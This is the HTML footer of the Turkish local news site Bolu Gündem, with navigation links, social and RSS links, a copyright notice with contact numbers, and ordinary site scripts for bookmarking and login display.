class="social"><a href="https://www.facebook.com/bolugundem" style="background-position: left -168px;" target="_blank" title="Facebook ile paylaş"></a><a href="http://www.bolugundem.com/rss/" style="background-position: left -144px;" target="_blank" title="RSS, News Feed, Haber Beslemesi"></a></div><ul class="nav"><li class="parent"><a href="http://www.bolugundem.com//" target="_self">Ana Sayfa</a></li><li class="sep">|</li><li class="parent"><a href="http://www.bolugundem.com/identity.php" target="_self">Künye</a></li><li class="sep">|</li><li class="parent"><a href="http://www.bolugundem.com/contact.php" target="_self">İletişim</a></li><li class="sep">|</li><li class="parent"><a href="#" target="_self" onclick="addToBookmark('Bolu Gündem', 'http://www.bolugundem.com/'); return false;">Sık Kullanılanlara Ekle</a></li><li class="sep">|</li><li class="parent"><a href="http://www.bolugundem.com/rss/" target="_self">RSS</a></li><li class="sep">|</li><li class="parent"><a href="http://www.bolugundem.com/guncel-haberleri-144hk.htm" target="_self">Güncel</a></li></ul><div class="info"><strong>Tüm Hakları Saklıdır &copy; 1989 Bolu Gündem Gazetesi</strong> | İzinsiz ve kaynak gösterilmeden yayınlanamaz.<br />Tel : (0.374) 217 66 66 | Faks : (0.374) 218 21 21 | <a href="http://www.cmbilisim.com/haber-portali-20s.htm" target="_blank" title="CMNews Haber Portalı Yazılımı">Haber Yazılımı</a>: <a href="http://www.cmbilisim.com/" target="_blank" title="CM Bilişim Teknolojileri">CM Bilişim</a></div></div></div><!-- 0.0090041160583496 --></div><script type="text/javascript">showLogin("", "", "", "")</script></body></html>